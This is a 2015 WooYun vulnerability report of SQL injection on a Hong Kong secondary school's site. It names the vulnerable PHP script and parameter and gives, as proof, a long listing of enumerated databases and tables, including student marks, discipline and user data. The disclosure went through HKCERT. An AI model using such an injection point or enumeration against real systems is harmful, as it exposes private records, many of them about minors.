漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0158151
漏洞标题:神召会康乐中学SQL注入漏洞(香港地區)
相关厂商:http://www.hebron.edu.hk
漏洞作者: 路人甲
提交时间:2015-12-04 17:40
修复时间:2016-01-21 18:22
公开时间:2016-01-21 18:22
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-21: 细节向公众公开
简要描述:
神召会康乐中学SQL注入漏洞
详细说明:
http://**.**.**.**/slp/v2_act_info_show.php?web_id=74
漏洞证明:
Database: s4choice15
[9 tables]
+---------------------------------------+
| choices-backup |
| choices-temp |
| rank1-1st-sem |
| choices |
| class1 |
| exclude |
| maths |
| rank1 |
| subject |
+---------------------------------------+
Database: morrison20122013
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: s5choice11
[5 tables]
+---------------------------------------+
| choices-sim |
| choices |
| class1 |
| maths |
| subject |
+---------------------------------------+
Database: question
[1 table]
+---------------------------------------+
| question |
+---------------------------------------+
Database: s4choice09
[9 tables]
+---------------------------------------+
| choices-t |
| class1-t |
| ranking-t |
| users-t |
| choices |
| class1 |
| ranking |
| users |
| users_real |
+---------------------------------------+
Database: aogarchive
[13 tables]
+---------------------------------------+
| cpg11d_albums |
| cpg11d_banned |
| cpg11d_categories |
| cpg11d_comments |
| cpg11d_config |
| cpg11d_ecards |
| cpg11d_exif |
| cpg11d_filetypes |
| cpg11d_pictures |
| cpg11d_temp_data |
| cpg11d_usergroups |
| cpg11d_users |
| cpg11d_votes |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: aogforum3
[62 tables]
+---------------------------------------+
| phpbb_acl_groups |
| phpbb_acl_options |
| phpbb_acl_roles |
| phpbb_acl_roles_data |
| phpbb_acl_users |
| phpbb_attachments |
| phpbb_banlist |
| phpbb_bbcodes |
| phpbb_bookmarks |
| phpbb_bots |
| phpbb_config |
| phpbb_confirm |
| phpbb_disallow |
| phpbb_drafts |
| phpbb_extension_groups |
| phpbb_extensions |
| phpbb_forums |
| phpbb_forums_access |
| phpbb_forums_track |
| phpbb_forums_watch |
| phpbb_groups |
| phpbb_icons |
| phpbb_lang |
| phpbb_log |
| phpbb_moderator_cache |
| phpbb_modules |
| phpbb_poll_options |
| phpbb_poll_votes |
| phpbb_posts |
| phpbb_privmsgs |
| phpbb_privmsgs_folder |
| phpbb_privmsgs_rules |
| phpbb_privmsgs_to |
| phpbb_profile_fields |
| phpbb_profile_fields_data |
| phpbb_profile_fields_lang |
| phpbb_profile_lang |
| phpbb_ranks |
| phpbb_reports |
| phpbb_reports_reasons |
| phpbb_search_results |
| phpbb_search_wordlist |
| phpbb_search_wordmatch |
| phpbb_sessions |
| phpbb_sessions_keys |
| phpbb_sitelist |
| phpbb_smilies |
| phpbb_styles |
| phpbb_styles_imageset |
| phpbb_styles_imageset_data |
| phpbb_styles_template |
| phpbb_styles_template_data |
| phpbb_styles_theme |
| phpbb_topics |
| phpbb_topics_posted |
| phpbb_topics_track |
| phpbb_topics_watch |
| phpbb_user_group |
| phpbb_users |
| phpbb_warnings |
| phpbb_words |
| phpbb_zebra |
+---------------------------------------+
Database: sen
[12 tables]
+---------------------------------------+
| mereport-bu |
| act_helper |
| act_records |
| activity2 |
| curr_adapt |
| lesson |
| mereport |
| parent_meeting |
| records |
| result1 |
| support_type |
| test_adapt |
+---------------------------------------+
Database: SLP3
[1 table]
+---------------------------------------+
| nametest |
+---------------------------------------+
Database: SLP2
[48 tables]
+---------------------------------------+
| student-bu |
| act_type |
| activity |
| admin_gp |
| admin_gp_tic |
| application1 |
| class1_2009 |
| class1_2010 |
| class1_2011 |
| class1_2012 |
| class1_2013 |
| class1_2014 |
| class1_2015 |
| club_gp |
| club_gp_tic |
| dateofbirth |
| duty |
| extra_hr |
| extra_hr2 |
| lc_coursetype |
| lc_institute |
| life_choice_2012 |
| life_choice_2013 |
| life_choice_2014 |
| life_choice_2015 |
| life_coach_2012 |
| life_coach_2013 |
| life_coach_2014 |
| life_coach_2015 |
| ole_type |
| organization |
| perform_gp |
| post_gp |
| records |
| selfacc |
| sequence1 |
| sequence2 |
| setting |
| slp_academic2 |
| slp_academic_namelist |
| std_club |
| student |
| student2 |
| sub_gp |
| sub_gp_tic |
| subject |
| subject2 |
| teacheric |
+---------------------------------------+
Database: s4choice10
[5 tables]
+---------------------------------------+
| choices-sim |
| choices |
| class1 |
| maths |
| subject |
+---------------------------------------+
Database: discipline
[3 tables]
+---------------------------------------+
| user |
| event_type |
| student_events |
+---------------------------------------+
Database: morrison20132014
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: hebronwp
[37 tables]
+---------------------------------------+
| bafs_commentmeta |
| bafs_comments |
| bafs_links |
| bafs_options |
| bafs_postmeta |
| bafs_posts |
| bafs_term_relationships |
| bafs_term_taxonomy |
| bafs_terms |
| bafs_usermeta |
| bafs_users |
| wp_4_commentmeta |
| wp_4_comments |
| wp_4_links |
| wp_4_options |
| wp_4_postmeta |
| wp_4_posts |
| wp_4_term_relationships |
| wp_4_term_taxonomy |
| wp_4_terms |
| wp_blog_versions |
| wp_blogs |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_registration_log |
| wp_signups |
| wp_site |
| wp_sitemeta |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------------------+
Database: blog1
[23 tables]
+---------------------------------------+
| bafs_commentmeta |
| bafs_comments |
| bafs_links |
| bafs_options |
| bafs_postmeta |
| bafs_posts |
| bafs_term_relationships |
| bafs_term_taxonomy |
| bafs_terms |
| bafs_usermeta |
| bafs_users |
| wp_commentmeta |
| wp_comments |
| wp_flickr_post |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------------------+
Database: discipline2
[6 tables]
+---------------------------------------+
| code |
| data |
| hcode |
| hdata |
| lcode |
| ldata |
+---------------------------------------+
Database: morrison20112012
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: PIE
[5 tables]
+---------------------------------------+
| form1 |
| keylearningarea |
| pie |
| subject |
| teacher |
+---------------------------------------+
Database: afterschool
[4 tables]
+---------------------------------------+
| class1_2012 |
| classstd2012 |
| classstd2012a |
| date1_2012 |
+---------------------------------------+
Database: gallery2
[20 tables]
+---------------------------------------+
| cpg149_albums |
| cpg149_banned |
| cpg149_bridge |
| cpg149_categories |
| cpg149_comments |
| cpg149_config |
| cpg149_dict |
| cpg149_ecards |
| cpg149_exif |
| cpg149_favpics |
| cpg149_filetypes |
| cpg149_hit_stats |
| cpg149_pictures |
| cpg149_plugins |
| cpg149_sessions |
| cpg149_temp_data |
| cpg149_usergroups |
| cpg149_users |
| cpg149_vote_stats |
| cpg149_votes |
+---------------------------------------+
Database: bookmarker_development
[2 tables]
+---------------------------------------+
| bookmarks |
| schema_info |
+---------------------------------------+
Database: SOW
[22 tables]
+---------------------------------------+
| chapter |
| class1 |
| comment |
| doccheck |
| eng_top |
| progress |
| scheme |
| subject |
| teach09 |
| teach10 |
| teach11 |
| teach12 |
| teach13 |
| teach14 |
| teach15 |
| users_old |
| writer10 |
| writer11 |
| writer12 |
| writer13 |
| writer14 |
| writer15 |
+---------------------------------------+
Database: eng_talk
[3 tables]
+---------------------------------------+
| bible |
| eng_talk |
| lsforum |
+---------------------------------------+
Database: aogforum
[32 tables]
+---------------------------------------+
| phpbb_auth_access |
| phpbb_banlist |
| phpbb_categories |
| phpbb_config |
| phpbb_confirm |
| phpbb_disallow |
| phpbb_easymod |
| phpbb_easymod_processed_files |
| phpbb_forum_prune |
| phpbb_forums |
| phpbb_groups |
| phpbb_posts |
| phpbb_posts_text |
| phpbb_privmsgs |
| phpbb_privmsgs_text |
| phpbb_ranks |
| phpbb_search_results |
| phpbb_search_wordlist |
| phpbb_search_wordmatch |
| phpbb_sessions |
| phpbb_sessions_keys |
| phpbb_smilies |
| phpbb_themes |
| phpbb_themes_name |
| phpbb_topics |
| phpbb_topics_watch |
| phpbb_user_group |
| phpbb_users |
| phpbb_vote_desc |
| phpbb_vote_results |
| phpbb_vote_voters |
| phpbb_words |
+---------------------------------------+
Database: s5chinatrip2011
[1 table]
+---------------------------------------+
| student |
+---------------------------------------+
Database: aog
[2 tables]
+---------------------------------------+
| notes |
| pupil08 |
+---------------------------------------+
Database: s4choice14
[11 tables]
+---------------------------------------+
| choices-bu3 |
| choices-bu |
| choices-temp2 |
| choices-temp |
| rank1-temp |
| choices |
| class1 |
| exclude |
| maths |
| rank1 |
| subject |
+---------------------------------------+
Database: s4choice12
[8 tables]
+---------------------------------------+
| choices |
| choices_leave |
| choices_temp |
| class1 |
| exclude |
| maths |
| rank1 |
| subject |
+---------------------------------------+
Database: s4choice11
[5 tables]
+---------------------------------------+
| choice-1 |
| choices |
| class1 |
| maths |
| subject |
+---------------------------------------+
Database: morrison20102011
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: s4choice13
[9 tables]
+---------------------------------------+
| choices |
| choices1 |
| choices_temp |
| class1 |
| exclude |
| maths |
| rank1 |
| rank1_temp |
| subject |
+---------------------------------------+
Database: exchange
[2 tables]
+---------------------------------------+
| init |
| transact |
+---------------------------------------+
Database: booklab
[48 tables]
+---------------------------------------+
| aog2005_booking |
| aog2005_course |
| aog2005_timetable |
| aog2005_userlist |
| aog2006_booking |
| aog2006_calendar |
| aog2006_timetable |
| aog_talk |
| cachechapter |
| cacheroom |
| xoops_avatar |
| xoops_avatar_user_link |
| xoops_banner |
| xoops_bannerclient |
| xoops_bannerfinish |
| xoops_block_module_link |
| xoops_config |
| xoops_configcategory |
| xoops_configoption |
| xoops_group_permission |
| xoops_groups |
| xoops_groups_users_link |
| xoops_image |
| xoops_imagebody |
| xoops_imagecategory |
| xoops_imgset |
| xoops_imgset_tplset_link |
| xoops_imgsetimg |
| xoops_modules |
| xoops_newblocks |
| xoops_online |
| xoops_pical_cat |
| xoops_pical_event |
| xoops_pical_plugins |
| xoops_priv_msgs |
| xoops_ranks |
| xoops_session |
| xoops_smiles |
| xoops_tplfile |
| xoops_tplset |
| xoops_tplsource |
| xoops_users |
| xoops_ws_project |
| xoops_ws_projects |
| xoops_ws_restrictions |
| xoops_ws_tasks |
| xoops_xoopscomments |
| xoops_xoopsnotifications |
+---------------------------------------+
Database: schann
[2 tables]
+---------------------------------------+
| me_events |
| me_settings |
+---------------------------------------+
Database: aogpfn
[15 tables]
+---------------------------------------+
| pfn_accesos |
| pfn_arquivos |
| pfn_arquivos_campos_palabras |
| pfn_bloqueo_ip |
| pfn_campos |
| pfn_configuracions |
| pfn_configuracions_datos |
| pfn_directorios |
| pfn_grupos |
| pfn_palabras |
| pfn_raices |
| pfn_raices_grupos_configuracions |
| pfn_raices_usuarios |
| pfn_sesions |
| pfn_usuarios |
+---------------------------------------+
Database: omr
[5 tables]
+---------------------------------------+
| key |
| queslist |
| result |
| scanlist |
| template |
+---------------------------------------+
Database: pwt1blog
[23 tables]
+---------------------------------------+
| serendipity_access |
| serendipity_authorgroups |
| serendipity_authors |
| serendipity_category |
| serendipity_comments |
| serendipity_config |
| serendipity_entries |
| serendipity_entrycat |
| serendipity_entryproperties |
| serendipity_groupconfig |
| serendipity_groups |
| serendipity_images |
| serendipity_mediaproperties |
| serendipity_options |
| serendipity_permalinks |
| serendipity_plugincategories |
| serendipity_pluginlist |
| serendipity_plugins |
| serendipity_references |
| serendipity_referrers |
| serendipity_spamblock_htaccess |
| serendipity_spamblocklog |
| serendipity_suppress |
+---------------------------------------+
Database: morrison20152016
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: morrison20082009
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: wordpress
[199 tables]
+---------------------------------------+
| ayp_commentmeta |
| ayp_comments |
| ayp_links |
| ayp_options |
| ayp_postmeta |
| ayp_posts |
| ayp_term_relationships |
| ayp_term_taxonomy |
| ayp_terms |
| ayp_usermeta |
| ayp_users |
| bafs_commentmeta |
| bafs_comments |
| bafs_links |
| bafs_options |
| bafs_postmeta |
| bafs_posts |
| bafs_term_relationships |
| bafs_term_taxonomy |
| bafs_terms |
| bafs_usermeta |
| bafs_users |
| bio_commentmeta |
| bio_comments |
| bio_links |
| bio_options |
| bio_postmeta |
| bio_posts |
| bio_term_relationships |
| bio_term_taxonomy |
| bio_terms |
| bio_usermeta |
| bio_users |
| bioclub_commentmeta |
| bioclub_comments |
| bioclub_links |
| bioclub_options |
| bioclub_postmeta |
| bioclub_posts |
| bioclub_term_relationships |
| bioclub_term_taxonomy |
| bioclub_terms |
| bioclub_usermeta |
| bioclub_users |
| c_sci_commentmeta |
| c_sci_comments |
| c_sci_links |
| c_sci_options |
| c_sci_postmeta |
| c_sci_posts |
| c_sci_term_relationships |
| c_sci_term_taxonomy |
| c_sci_terms |
| c_sci_usermeta |
| c_sci_users |
| career_commentmeta |
| career_comments |
| career_links |
| career_options |
| career_postmeta |
| career_posts |
| career_term_relationships |
| career_term_taxonomy |
| career_terms |
| career_usermeta |
| career_users |
| econ_commentmeta |
| econ_comments |
| econ_eg_attachments_clicks |
| econ_links |
| econ_options |
| econ_postmeta |
| econ_posts |
| econ_term_relationships |
| econ_term_taxonomy |
| econ_terms |
| econ_usermeta |
| econ_users |
| enviro_commentmeta |
| enviro_comments |
| enviro_links |
| enviro_options |
| enviro_postmeta |
| enviro_posts |
| enviro_term_relationships |
| enviro_term_taxonomy |
| enviro_terms |
| enviro_usermeta |
| enviro_users |
| flagcommentmeta |
| flagcomments |
| flaglinks |
| flagoptions |
| flagpostmeta |
| flagposts |
| flagterm_relationships |
| flagterm_taxonomy |
| flagterms |
| flagusermeta |
| flagusers |
| ls_commentmeta |
| ls_comments |
| ls_links |
| ls_options |
| ls_postmeta |
| ls_posts |
| ls_term_relationships |
| ls_term_taxonomy |
| ls_terms |
| ls_usermeta |
| ls_users |
| nssis_commentmeta |
| nssis_comments |
| nssis_links |
| nssis_options |
| nssis_postmeta |
| nssis_posts |
| nssis_term_relationships |
| nssis_term_taxonomy |
| nssis_terms |
| nssis_usermeta |
| nssis_users |
| phy_commentmeta |
| phy_comments |
| phy_links |
| phy_options |
| phy_postmeta |
| phy_posts |
| phy_term_relationships |
| phy_term_taxonomy |
| phy_terms |
| phy_usermeta |
| phy_users |
| pta_commentmeta |
| pta_comments |
| pta_links |
| pta_options |
| pta_postmeta |
| pta_posts |
| pta_term_relationships |
| pta_term_taxonomy |
| pta_terms |
| pta_usermeta |
| pta_users |
| teeth_commentmeta |
| teeth_comments |
| teeth_links |
| teeth_options |
| teeth_postmeta |
| teeth_posts |
| teeth_term_relationships |
| teeth_term_taxonomy |
| teeth_terms |
| teeth_usermeta |
| teeth_users |
| ths_commentmeta |
| ths_comments |
| ths_links |
| ths_options |
| ths_postmeta |
| ths_posts |
| ths_term_relationships |
| ths_term_taxonomy |
| ths_terms |
| ths_usermeta |
| ths_users |
| tl_commentmeta |
| tl_comments |
| tl_links |
| tl_options |
| tl_postmeta |
| tl_posts |
| tl_term_relationships |
| tl_term_taxonomy |
| tl_terms |
| tl_usermeta |
| tl_users |
| wp2_commentmeta |
| wp2_comments |
| wp2_links |
| wp2_options |
| wp2_postmeta |
| wp2_posts |
| wp2_term_relationships |
| wp2_term_taxonomy |
| wp2_terms |
| wp2_usermeta |
| wp2_users |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------------------+
Database: aogblog
[23 tables]
+---------------------------------------+
| serendipity_access |
| serendipity_authorgroups |
| serendipity_authors |
| serendipity_category |
| serendipity_comments |
| serendipity_config |
| serendipity_entries |
| serendipity_entrycat |
| serendipity_entryproperties |
| serendipity_groupconfig |
| serendipity_groups |
| serendipity_images |
| serendipity_mediaproperties |
| serendipity_options |
| serendipity_permalinks |
| serendipity_plugincategories |
| serendipity_pluginlist |
| serendipity_plugins |
| serendipity_references |
| serendipity_referrers |
| serendipity_spamblock_htaccess |
| serendipity_spamblocklog |
| serendipity_suppress |
+---------------------------------------+
Database: song
[1 table]
+---------------------------------------+
| song |
+---------------------------------------+
Database: inventry
[6 tables]
+---------------------------------------+
| admin |
| all_inventry |
| counter |
| hall_inventry |
| projector |
| tool_inventry |
+---------------------------------------+
Database: leaverc
[4 tables]
+---------------------------------------+
| leave_record |
| leave_type |
| opening |
| total_open |
+---------------------------------------+
Database: slp
[5 tables]
+---------------------------------------+
| attainment |
| event |
| groups |
| participate |
| profile |
+---------------------------------------+
Database: sch_event
[2 tables]
+---------------------------------------+
| events |
| events2011 |
+---------------------------------------+
Database: morrison20092010
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: wtpoon
[4 tables]
+---------------------------------------+
| onlinetest |
| onlinetest0607 |
| onlinetest0708 |
| onlinetest0809 |
+---------------------------------------+
Database: web0910
[17 tables]
+---------------------------------------+
| activity |
| admin1 |
| calendar2015 |
| circular |
| eca |
| info |
| menu1 |
| sportsrec |
| sub_area |
| subject |
| teacher |
| teacher2 |
| teacher2012 |
| teacher2013 |
| teacher2014 |
| teacher2015 |
| teacher_OLD |
+---------------------------------------+
Database: s1pro
[16 tables]
+---------------------------------------+
| alumni20140302 |
| alumni20141031 |
| alumni20151030 |
| dinner20140528 |
| dinner20150528 |
| dinner20150710 |
| golden |
| talk_list09 |
| talk_list10 |
| talk_list11 |
| talk_list12 |
| talk_list13 |
| talk_list13b |
| talk_list14 |
| talk_list15 |
| ypl1 |
+---------------------------------------+
Database: morrison20142015
[9 tables]
+---------------------------------------+
| award |
| class1 |
| marks |
| personal |
| report |
| student |
| subject |
| teach |
| users |
+---------------------------------------+
Database: example
[6 tables]
+---------------------------------------+
| contact_type |
| contacts |
| files |
| groups |
| tasks |
| tblpers |
+---------------------------------------+
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2015-12-09 14:37
厂商回复:
Referred to related parties.
最新状态:
暂无